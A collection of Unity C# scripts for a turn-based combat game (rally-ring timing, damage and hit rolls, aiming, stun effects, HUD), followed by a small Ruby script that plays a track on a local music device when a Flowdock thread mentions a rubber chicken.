private Coroutine rallyCoroutine;
public static RallyRing instance;
private void Awake()
{
instance = this;
}
private void Start()
{
originalColor = tokenImage.color;
ring.gameObject.SetActive(false);
CombatMenu.instance.onMenuActive.AddListener(DisableTimer);
}
private void OnEnable()
{
if (timer > 0f && timer < 0.5f)
{
timer += 1f; // Add one second on GUI re-enabled
}
}
private void Update()
{
if (CombatMenu.instance.isMenuActive) { return; }
if (!CombatMenu.instance.actionQueued) { return; }
if (timer > 0)
{
timer -= Time.deltaTime;
if (timer <= 0)
{
SpawnRallyRing();
}
}
if (isRallyActive)
{
if (Input.GetKeyDown(KeyCode.Space))
{
if (ring.localScale.x <= 1.2f && ring.localScale.x > 0.6f)
{
BoostActionSpeed();
}
else
{
ring.gameObject.SetActive(false);
Debug.Log("Mistimed!");
}
}
}
}
public void ChanceForRallyRing() // Called by PlayerController
{
timer = Random.Range(minTimer, maxTimer);
}
private void SpawnRallyRing()
{
rallyCoroutine = StartCoroutine(SpawnRallyRingCo());
}
private IEnumerator SpawnRallyRingCo()
{
if (isRallyActive) { yield return null; }
isRallyActive = true;
ring.gameObject.SetActive(true);
ring.localScale = new Vector2(3f, 3f);
float rallyDuration = Random.Range(minRallyDuration, maxRallyDuration);
ring.DOScale(0.5f, rallyDuration);
yield return new WaitForSeconds(rallyDuration);
isRallyActive = false;
}
private void BoostActionSpeed()
{
if (isBoosted) { return; }
StartCoroutine(BoostActionSpeedCo());
}
private IEnumerator BoostActionSpeedCo()
{
isBoosted = true;
Sequence mySequence = DOTween.Sequence();
mySequence.Append(tokenImage.DOColor(Color.white, 0.2f));
mySequence.Append(tokenImage.DOColor(originalColor, 0.2f));
boostAmount = PlayerController.instance.currentAction.baseSpeed * boostPct;
float newValue = Mathf.Clamp(PlayerController.instance.combatSlider.value - boostAmount, 0, 100);
DOTween.To(() => PlayerController.instance.combatSlider.value, x => PlayerController.instance.combatSlider.value = x, newValue, boostDuration);
yield return new WaitForSeconds(boostDuration + 0.2f);
ring.gameObject.SetActive(false);
isBoosted = false;
}
private void OnDisable()
{
//StopAllCoroutines();
isBoosted = false;
}
private void DisableTimer()
{
timer = -1f;
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public static class Helper
{
public static T FindComponentInChildWithTag<T>(this GameObject parent, string tag) where T : Component
{
Transform t = parent.transform;
foreach (Transform tr in t)
{
if (tr.tag == tag)
{
return tr.GetComponent<T>();
}
}
return null;
}
public static void AddMany<T>(this List<T> list, params T[] elements)
{
list.AddRange(elements);
}
public static bool RectOverlaps(this RectTransform a, RectTransform b)
{
return a.WorldRect().Overlaps(b.WorldRect());
}
public static bool RectOverlaps(this RectTransform a, RectTransform b, bool allowInverse)
{
return a.WorldRect().Overlaps(b.WorldRect(), allowInverse);
}
public static Rect WorldRect(this RectTransform rectTransform)
{
Vector2 sizeDelta = rectTransform.sizeDelta;
float rectTransformWidth = sizeDelta.x * rectTransform.lossyScale.x;
float rectTransformHeight = sizeDelta.y * rectTransform.lossyScale.y;
Vector3 position = rectTransform.position;
return new Rect(position.x - rectTransformWidth / 2f, position.y - rectTransformHeight / 2f, rectTransformWidth, rectTransformHeight);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using UnityEngine.UI;
using DG.Tweening;
public class DamageCalculator : MonoBehaviour
{
public enum CombatOutcome
{
Hit,
Missed,
Grazed,
Critical,
Blocked
}
public CombatOutcome combatOutcome;
[SerializeField] TextMeshProUGUI enemyDamage;
[SerializeField] TextMeshProUGUI playerDamage;
[SerializeField] TextMeshProUGUI enemyHealthCounter;
[SerializeField] TextMeshProUGUI playerHealthCounter;
[SerializeField] Image playerHealthBar;
[SerializeField] Image enemyHealthBar;
private float missRoll;
public int damageDealt;
private float finalHitChance;
public int maxHealth_Player;
public int currentHealth_Player;
public int maxHealth_Enemy;
public int currentHealth_Enemy;
public static DamageCalculator instance;
private void Awake()
{
instance = this;
}
private void Start()
{
currentHealth_Player = maxHealth_Player;
currentHealth_Enemy = maxHealth_Enemy;
UpdatePlayerHealth();
UpdateEnemyHealth();
}
//////////////////////////////////////////////////////////////
/// ENEMY ATTACKING PLAYER //////////////////////////////////
//////////////////////////////////////////////////////////////
public void DeterminePlayerFate(int damage, EnemyAction enemyAction) // Called by EnemyController
{
// Determine Combat Outcome
CheckPlayerFate(enemyAction.baseHitChance);
// Calculate Damage
CalculateDamageToPlayer(damage);
// Apply Status Effect
PlayerStatusEffect.instance.ApplyStatusEffect();
}
private void CheckPlayerFate(float hitChance)
{
// Roll for Miss/Hit
missRoll = Random.Range(0, 1f);
switch (PlayerController.instance.defendState)
{
case PlayerController.DefendState.Dodging:
finalHitChance = Mathf.Clamp(hitChance - PlayerController.instance.hitPenalty_Dodge, 0, 1);
if (missRoll > finalHitChance)
{
combatOutcome = CombatOutcome.Missed;
}
else
{
combatOutcome = CombatOutcome.Grazed;
}
break;
case PlayerController.DefendState.Blocking:
combatOutcome = CombatOutcome.Blocked;
break;
case PlayerController.DefendState.Quickstepping:
combatOutcome = CombatOutcome.Missed;
break;
case PlayerController.DefendState.None:
finalHitChance = hitChance;
if (missRoll > finalHitChance)
{
combatOutcome = CombatOutcome.Missed;
}
else
{
combatOutcome = CombatOutcome.Hit;
}
break;
}
Debug.Log("ROLL:" + missRoll);
Debug.Log("MISS IF HIGHER THAN: " + finalHitChance + "(" + hitChance + " - " + PlayerController.instance.hitPenalty_Dodge + ")");
}
private void CalculateDamageToPlayer(int effectiveDamage)
{
switch (combatOutcome)
{
case CombatOutcome.Missed:
break;
case CombatOutcome.Grazed:
damageDealt = Mathf.Clamp(Mathf.RoundToInt(effectiveDamage * (finalHitChance - missRoll)/finalHitChance), 1, effectiveDamage);
PlayerTakeDamage(damageDealt);
break;
case CombatOutcome.Blocked:
damageDealt = Mathf.Clamp(effectiveDamage - PlayerController.instance.baseBlockDamage, 1, effectiveDamage);
PlayerTakeDamage(damageDealt);
break;
case CombatOutcome.Hit:
damageDealt = effectiveDamage;
PlayerTakeDamage(damageDealt);
break;
}
}
public void UpdatePlayerHealth()
{
playerHealthBar.fillAmount = (float)currentHealth_Player / (float)maxHealth_Player;
playerHealthCounter.text = currentHealth_Player.ToString() + "/" + maxHealth_Player.ToString();
}
public void PlayerTakeDamage(int dmg)
{
currentHealth_Player = Mathf.Clamp(currentHealth_Player - dmg, 0, maxHealth_Player);
UpdatePlayerHealth();
}
//////////////////////////////////////////////////////////////
/// PLAYER ATTACKING ENEMY //////////////////////////////////
//////////////////////////////////////////////////////////////
public void DetermineEnemyFate(int damage, float hitChance) // Called by PlayerController
{
CheckEnemyFate(hitChance);
CalculateDamageToEnemy(damage);
// Apply Status Effect
EnemyStatusEffect.instance.ApplyStatusEffect();
}
private void CheckEnemyFate(float hitChance)
{
// Determine Hit or Missed
missRoll = Random.Range(0, 1f);
if (missRoll > hitChance)
{
combatOutcome = CombatOutcome.Missed;
}
else
{
combatOutcome = CombatOutcome.Hit;
}
}
private void CalculateDamageToEnemy(int damage)
{
// Update Damage Text and Enemy Health
switch (combatOutcome)
{
case CombatOutcome.Missed:
break;
case CombatOutcome.Grazed:
break;
case CombatOutcome.Hit:
damageDealt = damage;
EnemyTakeDamage(damageDealt);
break;
}
}
public void EnemyTakeDamage(int dmg)
{
currentHealth_Enemy = Mathf.Clamp(currentHealth_Enemy - damageDealt, 0, maxHealth_Enemy);
UpdateEnemyHealth();
}
public void UpdateEnemyHealth()
{
enemyHealthBar.fillAmount = (float) currentHealth_Enemy / (float) maxHealth_Enemy;
enemyHealthCounter.text = currentHealth_Enemy.ToString() + "/" + maxHealth_Enemy.ToString();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
using UnityEngine.Events;
public class Aiming : MonoBehaviour
{
[Header("Aiming")]
public bool aimActive;
[SerializeField] RectTransform origin;
[SerializeField] RectTransform topLine;
[SerializeField] RectTransform bottomLine;
[SerializeField] float aimSpeed;
[SerializeField] float rotateSpeed;
[SerializeField] LayerMask layerMask;
[SerializeField] Image iconImage;
private Image topLineImage;
private Image bottomLineImage;
private Color originalColor_top;
private Color originalColor_icon;
private Vector3 originalAngle_origin;
private Vector3 originalAngle_top;
private Vector3 originalAngle_bottom;
private bool isAiming;
private bool flashing;
Sequence aimSequence;
public UnityEvent onAimingFinished;
[Header("Weakspot")]
[SerializeField] Image spotImage;
[SerializeField] Color spotColor_1;
[SerializeField] Color spotColor_2;
public static Aiming instance;
private void Awake()
{
instance = this;
}
private void Start()
{
topLineImage = topLine.GetComponent<Image>();
bottomLineImage = bottomLine.GetComponent<Image>();
originalColor_top = topLineImage.color;
originalColor_icon = iconImage.color;
originalAngle_origin = origin.eulerAngles;
originalAngle_top = topLine.eulerAngles;
originalAngle_bottom = bottomLine.eulerAngles;
FlashWeakSpot();
}
public void TriggerAim()
{
aimActive = true;
origin.gameObject.SetActive(true);
topLine.gameObject.SetActive(true);
bottomLine.gameObject.SetActive(true);
iconImage.gameObject.SetActive(true);
spotImage.gameObject.SetActive(true);
}
private void Update()
{
Vector3 forward = topLine.TransformDirection(Vector3.down) * 10;
Debug.DrawRay(origin.position, forward, Color.green);
if (!aimActive) { return; }
if (Input.GetKey(KeyCode.DownArrow))
{
RotateOriginDown();
}
else if (Input.GetKey(KeyCode.UpArrow))
{
RotateOriginUp();
}
// Aim
if (Input.GetKey(KeyCode.Q))
{
AimingReticule();
}
if(Input.GetKeyUp(KeyCode.Q))
{
FinishAim();
}
}
private void FinishAim()
{
isAiming = false;
aimSequence.Kill();
topLineImage.color = originalColor_top;
onAimingFinished.Invoke();
DetectHit();
}
private void DetectHit()
{
float angleZ = Random.Range(topLine.eulerAngles.z, bottomLine.eulerAngles.z);
Debug.Log(angleZ);
topLine.eulerAngles = bottomLine.eulerAngles = new Vector3(topLine.eulerAngles.x, topLine.eulerAngles.y, angleZ);
RaycastHit hit;
if (Physics.Raycast(origin.position, topLine.transform.TransformDirection(Vector3.down), out hit, 100f, layerMask))
{
PlayerController.instance.currentAction.STUN = true;
}
else
{
PlayerController.instance.currentAction.STUN = false;
}
spotImage.gameObject.SetActive(false);
iconImage.gameObject.SetActive(false);
topLine.gameObject.SetActive(false);
bottomLine.gameObject.SetActive(false);
PlayerController.instance.PerformAction();
}
private void RotateOriginUp()
{
origin.Rotate(new Vector3(0, 0, 1) * Time.deltaTime * rotateSpeed);
}
private void RotateOriginDown()
{
origin.Rotate(new Vector3(0, 0, -1) * Time.deltaTime * rotateSpeed);
}
private void AimingReticule()
{
isAiming = true;
topLine.gameObject.SetActive(true);
bottomLine.gameObject.SetActive(true);
if (Quaternion.Angle(topLine.rotation, bottomLine.rotation) < 1 || topLine.eulerAngles.z < bottomLine.eulerAngles.z)
{
topLine.eulerAngles = new Vector3(topLine.eulerAngles.x, topLine.eulerAngles.y, bottomLine.eulerAngles.z);
FlashAimLine();
return;
}
topLine.Rotate(new Vector3(0, 0, -1) * Time.deltaTime * aimSpeed);
bottomLine.Rotate(new Vector3(0, 0, 1) * Time.deltaTime * aimSpeed);
}
private void FlashAimLine()
{
if (flashing) { return; }
flashing = true;
topLineImage.color = Color.white;
iconImage.color = Color.white;
aimSequence = DOTween.Sequence();
aimSequence
.Append(topLineImage.DOFade(0.2f, 0.1f))
.Append(topLineImage.DOFade(1f, 0.1f))
.SetLoops(-1);
}
private void FlashWeakSpot()
{
Sequence spotSequence = DOTween.Sequence();
spotSequence
.Append(spotImage.DOColor(spotColor_1, 0.3f))
.Append(spotImage.DOColor(spotColor_2, 0.3f))
.SetLoops(-1);
}
private void ResetAim()
{
flashing = false;
aimSequence.Kill();
topLineImage.color = originalColor_top;
iconImage.color = originalColor_icon;
origin.eulerAngles = originalAngle_origin;
topLine.eulerAngles = originalAngle_top;
bottomLine.eulerAngles = originalAngle_bottom;
iconImage.gameObject.SetActive(false);
topLine.gameObject.SetActive(false);
bottomLine.gameObject.SetActive(false);
spotImage.gameObject.SetActive(false);
}
private void OnDisable()
{
ResetAim();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using UnityEngine.Events;
public class CombatManager : MonoBehaviour
{
[SerializeField] GameObject elementsGUI;
[SerializeField] Animator cameraAnimator;
[SerializeField] GameObject actorSprites;
[SerializeField] GameObject recoverVFX;
[SerializeField] float waitForActionName;
public string currentActionName;
public int currentSequence;
[SerializeField] GameObject combatCanvas;
[SerializeField] GameObject[] combatSequence;
public bool pauseSlider;
public UnityEvent onPrecombatStart;
public UnityEvent onPrecombatEnd;
public UnityEvent onCombatStarted;
public UnityEvent onCombatFinished;
public static CombatManager instance;
private void Awake()
{
instance = this;
}
private void Start()
{
CombatMenu.instance.onMenuActive.AddListener(PauseCombatSlider);
}
// ========== Called by PlayerController & EnemyController when sliders reach zero ================================================
public void PlayerTriggerPrecombat(PlayerAction playerAction)
{
PauseCombatSlider();
currentActionName = playerAction.actionName;
currentSequence = playerAction.sequenceID;
StartCoroutine(PlayerPrecombatCamera(playerAction));
onPrecombatStart.Invoke();
}
public void EnemyTriggerPrecombat(EnemyAction enemyAction)
{
PauseCombatSlider();
currentActionName = enemyAction.actionName;
currentSequence = enemyAction.sequenceID;
StartCoroutine(EnemyPrecombatCamera(enemyAction));
onPrecombatStart.Invoke();
}
// ========== CAMERA MOVEMENTS ================================================================================================
private IEnumerator PlayerPrecombatCamera(PlayerAction playerAction)
{
elementsGUI.SetActive(false);
PanCameraLeft();
if (playerAction.actionType == PlayerAction.ActionType.ShortWait || playerAction.actionType == PlayerAction.ActionType.LongWait)
{
recoverVFX.SetActive(true);
}
yield return new WaitForSeconds(waitForActionName);
onPrecombatEnd.Invoke();
if(playerAction.actionType == PlayerAction.ActionType.Attack)
{
StartCombatCamera();
StartCombatSequence();
}
else
{
cameraAnimator.SetTrigger("Default");
ResumeCombatSlider();
elementsGUI.SetActive(true);
}
}
private IEnumerator EnemyPrecombatCamera(EnemyAction enemyAction)
{
elementsGUI.SetActive(false);
PanCameraRight();
yield return new WaitForSeconds(waitForActionName);
onPrecombatEnd.Invoke();
StartCombatCamera();
StartCombatSequence();
}
public void StartCombatCamera()
{
cameraAnimator.SetTrigger("Zoom");
actorSprites.SetActive(false);
}
public void PanCameraLeft()
{
cameraAnimator.SetTrigger("PanLeft");
}
public void PanCameraRight()
{
cameraAnimator.SetTrigger("PanRight");
}
// ========== COMBAT SPRITES ================================================================================================
public void PauseCombatSlider()
{
pauseSlider = true;
}
public void ResumeCombatSlider()
{
pauseSlider = false;
}
public void StartCombatSequence()
{
combatSequence[currentSequence].SetActive(true);
onCombatStarted.Invoke();
}
public void EndCombatSequence() // Called by Individual CombatSequence
{
ResumeCombatSlider();
foreach (GameObject sequence in combatSequence)
{
sequence.SetActive(false);
}
onCombatFinished.Invoke();
}
// ========== REVEAL - Called by Animator ================================================================================================
public void RevealActors()
{
elementsGUI.SetActive(true);
actorSprites.SetActive(true);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using DG.Tweening;
using UnityEngine.UI;
public class ActionName : MonoBehaviour
{
[SerializeField] Image smudge;
private Material smudgeMat;
[SerializeField] TextMeshProUGUI nameText;
// Start is called before the first frame update
private void Awake()
{
smudgeMat = smudge.material;
}
private void OnEnable()
{
RevealActionName();
}
private void RevealActionName()
{
nameText.color = new Color(nameText.color.r, nameText.color.g, nameText.color.b, 0);
smudgeMat.SetFloat("_FadeAmount", 0.4f);
smudgeMat.DOFloat(0f, "_FadeAmount", 0.5f);
nameText.DOFade(1f, 0.5f);
//Sequence mySequence = DOTween.Sequence();
//mySequence.Append(smudgeMat.DOFloat(0f, "_FadeAmount", 0.25f));
//mySequence.Append(nameText.DOFade(1f, 0.25f));
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Weakspot : MonoBehaviour
{
[SerializeField] float speed = 1f;
[SerializeField] float moveDistance = 5f;
[SerializeField] float wait = 1f;
private Vector3 newPos;
private void OnEnable()
{
StartCoroutine(SetNewPosition());
}
private void Update()
{
transform.localPosition = Vector3.Lerp(transform.localPosition, newPos, Time.deltaTime * speed);
}
private IEnumerator SetNewPosition()
{
while (true)
{
float randomX = Random.Range(transform.localPosition.x - moveDistance, transform.localPosition.x + moveDistance);
float randomY = Random.Range(transform.localPosition.y - moveDistance, transform.localPosition.y + moveDistance);
newPos = new Vector3(randomX, randomY, transform.localPosition.z);
yield return new WaitForSeconds(1f);
}
}
private void OnDisable()
{
StopAllCoroutines();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using TMPro;
using UnityEngine.Events;
public class PlayerController : MonoBehaviour
{
public enum DefendState
{
None,
Dodging,
Blocking,
Quickstepping,
Waiting
}
public DefendState defendState;
[Header("Events")]
public UnityEvent onActionChosen;
public UnityEvent onActionReady;
public PlayerAction currentAction;
[Header("Slider")]
public Slider combatSlider;
public float sliderInterval;
[SerializeField] float sliderSpeed;
[SerializeField] GameObject sliderHandle;
[SerializeField] TextMeshProUGUI counterText;
[Header("Speed")]
public float effectiveSpeed;
public float speedModifier = 1f;
[Header("Dodge")]
public float baseHitPenalty_Dodge;
public float hitPenalty_Dodge;
[Header("Block")]
public int baseBlockDamage;
[Header("Wait")]
public float longWaitFactor = 0.002f;
public float longWaitConst = 0.75f;
public float maxLongWait = 100;
public float minlongWait = 25;
public static PlayerController instance;
private void Awake()
{
instance = this;
}
void Start()
{
CombatManager.instance.onCombatFinished.AddListener(ResetDefendState);
}
// ==================== Called by CombatButton when Select ========================================================
public void SetCurrentAction(PlayerAction playerAction)
{
currentAction = playerAction;
}
// ==================== Called by CombatButton when Confirm ========================================================
public void ChooseCombatAction(PlayerAction playerAction)
{
CombatManager.instance.ResumeCombatSlider();
if (playerAction.actionType == PlayerAction.ActionType.Quickstep)
{
Quickstep.instance.SpawnArrows();
}
else if (playerAction.useAmmo)
{
Aiming.instance.TriggerAim();
}
else
{
if (playerAction.baseSpeed > 0)
{
StartCoroutine(ActivateCombatSlider());
CombatHUD.instance.DisplaySliderHandle();
CombatMenu.instance.actionQueued = true;
}
}
onActionChosen.Invoke();
}
// ==================== Slider Behavior ========================================================
private IEnumerator ActivateCombatSlider()
{
combatSlider.value = effectiveSpeed;
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
RallyRing.instance.ChanceForRallyRing();
while (combatSlider.value >= 0)
{
if (CombatMenu.instance.isMenuActive) { yield return null; }
else if (CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
combatSlider.value = Mathf.Clamp(combatSlider.value - sliderSpeed, 0, 100);
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
if (combatSlider.value == 0)
{
PerformAction();
//currentAction = null;
CombatMenu.instance.actionQueued = false;
yield break;
}
yield return new WaitForSeconds(sliderInterval);
}
}
}
// ==================== When slider reaches zero ========================================================
public void PerformAction()
{
onActionReady.Invoke();
switch (currentAction.actionType)
{
case PlayerAction.ActionType.Dodge:
defendState = DefendState.Dodging;
CalculateDodgeChance();
break;
case PlayerAction.ActionType.Block:
defendState = DefendState.Blocking;
break;
case PlayerAction.ActionType.ShortWait:
defendState = DefendState.Waiting;
CombatManager.instance.PlayerTriggerPrecombat(currentAction);
Sanity.instance.RegainSanity();
break;
case PlayerAction.ActionType.LongWait:
defendState = DefendState.Waiting;
CombatManager.instance.PlayerTriggerPrecombat(currentAction);
Sanity.instance.RegainSanity();
break;
case PlayerAction.ActionType.Attack:
CombatManager.instance.PlayerTriggerPrecombat(currentAction);
DamageCalculator.instance.DetermineEnemyFate(currentAction.baseDamage, currentAction.baseHitChance);
break;
}
}
// ==================== Other Calculations ========================================================
public void ResetDefendState()
{
defendState = DefendState.None;
}
private void CalculateDodgeChance()
{
hitPenalty_Dodge = baseHitPenalty_Dodge + EnemyController.instance.combatSlider.value / 100;
}
public void CalculateEffectiveSpeed()
{
if (currentAction.actionType == PlayerAction.ActionType.LongWait)
{
CalculateLongWaitSpeed();
}
else
{
effectiveSpeed = currentAction.baseSpeed * speedModifier;
}
}
public void CalculateLongWaitSpeed()
{
float waitSpeed = Mathf.Pow(Sanity.instance.sanityCounter, 2f) / Mathf.Pow(longWaitConst, 2f) * longWaitFactor;
effectiveSpeed = Mathf.RoundToInt(Mathf.Clamp(waitSpeed, minlongWait, maxLongWait));
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
[CreateAssetMenu(menuName = "Enemy Action")]
public class EnemyAction : ScriptableObject
{
[Header("Attributes")]
public string actionName;
public int minDamage;
public int maxDamage;
public int minSpeed;
public int maxSpeed;
public int sequenceID;
public float baseHitChance;
public float cooldown;
[Header("BLEED")]
public bool BLEED;
[Header("BLEED")]
public bool POISON;
public int POISON_Counter;
public int POISON_damagePerTick;
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
public class EnemyStatusEffect : MonoBehaviour
{
[Header("Stun")]
public bool isStun;
public int stun_Counter;
[SerializeField] TextMeshProUGUI stunText;
public static EnemyStatusEffect instance;
private void Awake()
{
instance = this;
}
public void ApplyStatusEffect()
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
break;
default:
if (PlayerController.instance.currentAction.STUN)
{
InflictSTUN();
}
break;
}
}
//========= STUN ===============================================================================================================================
public void InflictSTUN()
{
if (isStun) { return; }
isStun = true;
stun_Counter += PlayerController.instance.currentAction.STUN_Counter;
stunText.text = stun_Counter.ToString();
stunText.transform.parent.gameObject.SetActive(true);
StartCoroutine(STUNCoroutine());
}
private IEnumerator STUNCoroutine()
{
while (true)
{
yield return StartCoroutine(BattleCountdown(1f));
stun_Counter--;
stunText.text = stun_Counter.ToString();
if (stun_Counter == 0)
{
stunText.transform.parent.gameObject.SetActive(false);
isStun = false;
yield break;
}
}
}
//=========== HELPER =============================================================================================================================
public static IEnumerator BattleCountdown(float duration)
{
float timer = 0;
while (true)
{
if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
timer += Time.deltaTime;
if (timer >= duration)
{
yield break;
}
}
yield return null;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using TMPro;
public class DamageCounter : MonoBehaviour
{
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using TMPro;
using DG.Tweening;
public class CombatHUD : MonoBehaviour
{
[Header("Action Name")]
[SerializeField] TextMeshProUGUI actionText;
[Header("Damage Text")]
[SerializeField] GameObject combatCanvas;
[SerializeField] TextMeshProUGUI enemyDamage;
[SerializeField] TextMeshProUGUI playerDamage;
private float enemy_originY;
private float player_originY;
[Header("Player Slider")]
[SerializeField] Slider previewSlider;
[SerializeField] GameObject sliderHandle;
[SerializeField] TextMeshProUGUI counterText;
public TextMeshProUGUI queueText_Player;
public TextMeshProUGUI queueText_Enemy;
public static CombatHUD instance;
private void Awake()
{
instance = this;
}
private void Start()
{
player_originY = playerDamage.rectTransform.anchoredPosition.y;
enemy_originY = enemyDamage.rectTransform.anchoredPosition.y;
CombatManager.instance.onPrecombatStart.AddListener(DisplayActionName);
CombatManager.instance.onPrecombatEnd.AddListener(HideActionName);
CombatManager.instance.onCombatStarted.AddListener(EnableCombatCanvas);
CombatManager.instance.onCombatFinished.AddListener(DisableCombatCanvas);
PlayerController.instance.onActionChosen.AddListener(DisplayPlayerQueueText);
PlayerController.instance.onActionReady.AddListener(HidePlayerQueueText);
PlayerController.instance.onActionReady.AddListener(HideSliderHandle);
EnemyController.instance.onActionChosen.AddListener(DisplayEnemyQueueText);
EnemyController.instance.onActionReady.AddListener(HideEnemyQueueText);
sliderHandle.SetActive(false);
}
// ================================== ACTION NAME ================================================================
public void DisplayActionName()
{
actionText.transform.parent.gameObject.SetActive(true);
actionText.text = CombatManager.instance.currentActionName;
}
public void HideActionName()
{
actionText.text = null;
actionText.transform.parent.gameObject.SetActive(false);
}
// ================================== DAMAGE TEXT ================================================================
public void EnableCombatCanvas()
{
combatCanvas.SetActive(true);
}
public void DisableCombatCanvas()
{
combatCanvas.SetActive(false);
}
public void DisplayEnemyDamage() // Called by Combat Sprites
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
enemyDamage.text = "MISSED";
enemyDamage.color = Color.white;
enemyDamage.fontSize = 50;
break;
//case DamageCalculator.CombatOutcome.Grazed:
// enemyDamage.text = "GRAZED\n" + DamageCalculator.instance.damageDealt.ToString();
// enemyDamage.color = Color.red;
// enemyDamage.fontSize = 50;
// break;
default:
if (PlayerController.instance.currentAction.STUN && EnemyController.instance.combatSlider.value > 0)
{
EnemyController.instance.combatSlider.value = 0;
enemyDamage.text = "<size=50>STUNNED</size>\n" + DamageCalculator.instance.damageDealt.ToString();
enemyDamage.color = Color.red;
enemyDamage.fontSize = 100;
}
else
{
enemyDamage.text = DamageCalculator.instance.damageDealt.ToString();
enemyDamage.color = Color.red;
enemyDamage.fontSize = 100;
}
break;
}
enemyDamage.rectTransform.anchoredPosition = new Vector3(enemyDamage.rectTransform.anchoredPosition.x, enemy_originY);
enemyDamage.rectTransform.DOAnchorPosY(enemy_originY + 150f, 1.2f);
enemyDamage.DOFade(0f, 1.2f);
}
public void DisplayPlayerDamage() // Called by Combat Sprites
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
playerDamage.text = "MISSED";
playerDamage.color = Color.white;
playerDamage.fontSize = 50;
break;
case DamageCalculator.CombatOutcome.Grazed:
playerDamage.text = "GRAZED\n" + DamageCalculator.instance.damageDealt.ToString();
playerDamage.color = Color.red;
playerDamage.fontSize = 50;
break;
default:
playerDamage.text = DamageCalculator.instance.damageDealt.ToString();
playerDamage.color = Color.red;
playerDamage.fontSize = 100;
break;
}
//playerDamage.color = new Color(playerDamage.color.r, playerDamage.color.g, playerDamage.color.b, 255);
playerDamage.rectTransform.anchoredPosition = new Vector3(playerDamage.rectTransform.anchoredPosition.x, player_originY);
playerDamage.rectTransform.DOAnchorPosY(player_originY + 150f, 1.2f);
playerDamage.DOFade(0f, 1.2f);
}
// ================================== QUEUE TEXT & SLIDER HANDLE ================================================================
public void DisplayPlayerQueueText()
{
queueText_Player.text = PlayerController.instance.currentAction.actionName;
HidePreviewSlider();
}
public void HidePlayerQueueText()
{
queueText_Player.text = null;
}
public void DisplaySliderHandle()
{
sliderHandle.SetActive(true);
}
public void HideSliderHandle()
{
sliderHandle.SetActive(false);
}
public void DisplayEnemyQueueText()
{
queueText_Enemy.text = EnemyController.instance.currentAction.actionName;
}
public void HideEnemyQueueText()
{
queueText_Player.text = null;
}
// ================================== PREVIEW SLIDER ================================================================
public void ShowPreviewSlider() // Called by CombatButton
{
previewSlider.gameObject.SetActive(true);
previewSlider.value = PlayerController.instance.effectiveSpeed;
counterText.text = previewSlider.value.ToString();
// TESTING DODGE CALCULATION
//float previewPenalty = baseHitPenalty_Dodge + (EnemyController.instance.combatSlider.value - effectiveSpeed) / 100;
//dodgePenaltyText.text = previewPenalty.ToString();
}
public void HidePreviewSlider()
{
previewSlider.value = 0;
counterText.text = null;
previewSlider.gameObject.SetActive(false);
}
}
| 17f9084347384e71673f4b4778d113fa4a3b842a | [
"C#",
"Text"
] | 23 | C# | pictagor/Project-Quietus | e608e8fdb6880c9e73bd023530942262680e06e2 | 85828da7a0d5effc1d2227477e9ac7fa3110b4d0 |
refs/heads/main | <repo_name>Ryan-Walsh-6/ICS3U-Unit3-02-CPP<file_sep>/guessing_game.cpp
// Copyright (c) 2020 <NAME> All rights reserved
//
// Created by <NAME>
// Created on November 30 2020
// this program checks to see if the number guessed is the magic number
#include <iostream>
int main() {
// this program checks to see if the number guessed is the magic number
const int MAGIC_NUMBER = 5;
int guessed_number;
// input
std::cout << "Enter a number(between 0-9)):";
std::cin >> guessed_number;
std::cout << "" << std::endl;
// process
if (guessed_number == MAGIC_NUMBER) {
// output
std::cout << "Congratulations! You guessed the right number!";
}
}
| 6e6eca681811d130af0fa0109a5c6b5e5e117396 | [
"C++"
] | 1 | C++ | Ryan-Walsh-6/ICS3U-Unit3-02-CPP | 0d051f808d7a1e68c473355b4820cfd6bbd106ef | 9572450e8e53fc97f8083d451cdf523c0b7107c7 |
refs/heads/master | <file_sep># require 'sinatra'
puts 'starting the app..'
require 'httparty'
require 'eventmachine'
require 'em-http'
require 'json'
$api_token = ENV['fd_api_token']
$organization = 'redant'
$flow = 'public-release'
http = EM::HttpRequest.new("https://stream.flowdock.com/flows/#{$organization}/#{$flow}",
:keepalive => true,
:connect_timeout => 0,
:inactivity_timeout => 0
)
class FlowdockResponse
def initialize(json)
@title = json['thread']['title'] if json['thread']
end
def chicken?
if @title
@title.match /:rubber-chicken:/
end
end
end
class MikeMachine
include HTTParty
base_uri 'http://192.168.2.59'
def self.rock_on(track = 1)
get("/play?track=#{track}")
end
def self.noize(level = 20)
get("/level?level=#{level}")
end
end
EventMachine.run do
stream = http.get(:head => {
'Authorization' => [$api_token, ''],
'accept' => 'application/json'
})
buffer = ''
stream.stream do |chunk|
buffer << chunk
while line = buffer.slice!(/.+\r\n/)
response = FlowdockResponse.new(JSON.parse(line))
if response.chicken?
MikeMachine.noize
MikeMachine.rock_on
end
end
end
end
| d3b6e1d4bd89d2ec73d601427c7e6723c5567f34 | [
"Ruby"
] | 1 | Ruby | mcauser/rubber-chickenz | 691b09e8e35df756c8c9ced80385a25c92086c98 | f54ea93f3a0ae62f1b401dd961baccda0a3c8047 |
